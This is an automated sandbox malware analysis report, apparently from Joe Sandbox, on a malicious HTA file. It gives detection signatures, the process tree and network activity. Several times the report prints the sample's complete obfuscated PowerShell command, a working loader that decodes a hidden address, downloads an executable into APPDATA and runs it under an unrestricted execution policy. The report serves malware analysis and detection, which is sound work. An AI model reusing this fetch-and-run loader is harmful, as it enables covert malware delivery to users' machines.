Windows Analysis Report
qwertyuiopasdfghjklzxcvbnm.hta

Overview

General Information

Sample name: qwertyuiopasdfghjklzxcvbnm.hta
Analysis ID: 1583693
MD5: 3ed42aa65e65e6f7ae0dd6c83200e076
SHA1: bd6d720a134ad38173bf5eaf07f3357d2653ec0c
SHA256: c51efd8c212706aa13de88fac4d6a28e29a44efeb93d39b188d61c51ca2259d5
Tags: hta, user-abuse_ch

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7400 cmdline: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • putty.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: 765BDC0F8BC0D77F7414E7A36AE45FD9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7496 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |

System Summary

Source: Process started, Author: Michael Haag, Data: CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe
Source: Process started, Author: frack113, Data: CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Roaming\putty.exe
Source: Process started, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-03T12:17:57.355363+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 93.93.131.124 | 443 | TCP

AV Detection

Source: qwertyuiopasdfghjklzxcvbnm.hta, Virustotal: Detection: 11%
Source: unknown, HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\putty.exe, Code function: 3_2_00007FF738A5FB90 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId
Source: C:\Users\user\AppData\Roaming\putty.exe, Code function: 3_2_00007FF738A844D0 GetProcAddress,FindFirstFileW,CloseHandle
Source: global traffic, HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1, Host: the.earth.li, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /~sgtatham/putty/0.82/w64/putty.exe HTTP/1.1, Host: the.earth.li
Source: Joe Sandbox View, IP Address: 93.93.131.124
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 93.93.131.124:443
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\putty.exe, Code function: 3_2_00007FF738A6CBA0 recv
Source: global traffic, DNS traffic detected: DNS query: the.earth.li
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\AppData\Roaming\putty.exe, Code function: 3_2_00007FF738A3BDC0 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard
Source: C:\Users\user\AppData\Roaming\putty.exe, Code function: 3_2_00007FF738A372F0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree
Source: C:\Users\user\AppData\Roaming\putty.exe, Code function: 3_2_00007FF738A38900 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA
Source: C:\Users\user\AppData\Roaming\putty.exe, Code function: 3_2_00007FF738A3CB10 GetKeyboardState

System Summary

Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\putty.exe
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEE21C3_2_00007FF738AEE21C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEF2883_2_00007FF738AEF288
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A732803_2_00007FF738A73280
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AAA2703_2_00007FF738AAA270
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AB12603_2_00007FF738AB1260
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AED3D43_2_00007FF738AED3D4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AFA3D03_2_00007FF738AFA3D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A763D03_2_00007FF738A763D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A673B03_2_00007FF738A673B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AB04003_2_00007FF738AB0400
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3A3563_2_00007FF738A3A356
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3A37A3_2_00007FF738A3A37A
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A363803_2_00007FF738A36380
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3A36E3_2_00007FF738A3A36E
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A444D03_2_00007FF738A444D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF54E43_2_00007FF738AF54E4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B174383_2_00007FF738B17438
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEF4703_2_00007FF738AEF470
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AAE5B03_2_00007FF738AAE5B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA85803_2_00007FF738AA8580
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AAD5603_2_00007FF738AAD560
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A5E6D03_2_00007FF738A5E6D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF16C03_2_00007FF738AF16C0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3F6B03_2_00007FF738A3F6B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A377103_2_00007FF738A37710
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B0E6343_2_00007FF738B0E634
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A816603_2_00007FF738A81660
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEF6583_2_00007FF738AEF658
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B097F83_2_00007FF738B097F8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A450BA3_2_00007FF738A450BA
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A867F03_2_00007FF738A867F0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A697E03_2_00007FF738A697E0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B107643_2_00007FF738B10764
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3D7403_2_00007FF738A3D740
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A397303_2_00007FF738A39730
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A467873_2_00007FF738A46787
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A418A03_2_00007FF738A418A0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A389003_2_00007FF738A38900
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A4E8503_2_00007FF738A4E850
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A738203_2_00007FF738A73820
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00007FF738B01618 appears 33 times
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00007FF738AFA0EC appears 402 times
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00007FF738A83B20 appears 63 times
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00007FF738AFE580 appears 57 times
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00007FF738A6EA20 appears 95 times
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00007FF738AA6C00 appears 43 times
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00007FF738A82B20 appears 66 times
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal68.evad.winHTA@6/4@1/1
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A74050 FormatMessageA,GetLastError,3_2_00007FF738A74050
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A5A1D0 CoCreateInstance,CoCreateInstance,CoCreateInstance,CoCreateInstance,CoCreateInstance,3_2_00007FF738A5A1D0
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A3D570 GetProcAddress,FreeLibrary,FindResourceA,SizeofResource,LoadResource,LockResource,3_2_00007FF738A3D570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\putty.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he4r4m0m.byu.ps1
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: qwertyuiopasdfghjklzxcvbnm.hta Virustotal: Detection: 11%
Source: putty.exe String found in binary or memory: config-ssh-portfwd-address-family
Source: putty.exe String found in binary or memory: config-address-family
Source: putty.exe String found in binary or memory: config-serial-stopbits
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll, wldp.dll, mshtml.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, cryptbase.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, windows.storage.dll, propsys.dll, msimtf.dll, dxgi.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, resourcepolicyclient.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, mpr.dll, scrrun.dll, sxs.dll, msasn1.dll, gpapi.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, msls31.dll, jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Roaming\putty.exe Section loaded: apphelp.dll, uxtheme.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, winmm.dll, secur32.dll, sspicli.dll, textshaping.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\putty.exe Window detected: Number of UI elements: 20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;
Source: putty.exe.1.dr Static PE information: section name: .00cfg
Source: putty.exe.1.dr Static PE information: section name: .gxfg
Source: putty.exe.1.dr Static PE information: section name: _RDATA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07CB1691 push ss; retf 1_2_07CB169E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07CB0013 push ds; retf 1_2_07CB0016
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A34F39 push qword ptr [rax+22FFFFCBh]; ret 3_2_00007FF738A34F41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\putty.exe
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A39980 IsIconic,SetWindowTextW,SetWindowTextA,3_2_00007FF738A39980
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A39B00 IsIconic,ShowWindow,3_2_00007FF738A39B00
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A39A40 IsIconic,SetWindowTextW,SetWindowTextA,3_2_00007FF738A39A40
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6A030 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,WSAStartup,WSAStartup,3_2_00007FF738A6A030
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4434
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5312
Source: C:\Users\user\AppData\Roaming\putty.exe Evaded block: after key decision graph_3-81310
Source: C:\Users\user\AppData\Roaming\putty.exe Evaded block: after key decision graph_3-81446
Source: C:\Users\user\AppData\Roaming\putty.exe Evaded block: after key decision graph_3-81507
Source: C:\Users\user\AppData\Roaming\putty.exe API coverage: 4.6 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A5FB90 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,3_2_00007FF738A5FB90
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A844D0 GetProcAddress,FindFirstFileW,CloseHandle,3_2_00007FF738A844D0
Source: mshta.exe, 00000000.00000003.1737718734.00000000035B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: putty.exe, 00000003.00000002.2898744443.0000020377647000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: powershell.exe, 00000001.00000002.1714732257.000000000795D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000001.00000002.1717380349.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000001.00000002.1714732257.000000000795D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: powershell.exe, 00000001.00000002.1715064854.00000000079C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738B02F94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF738B02F94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
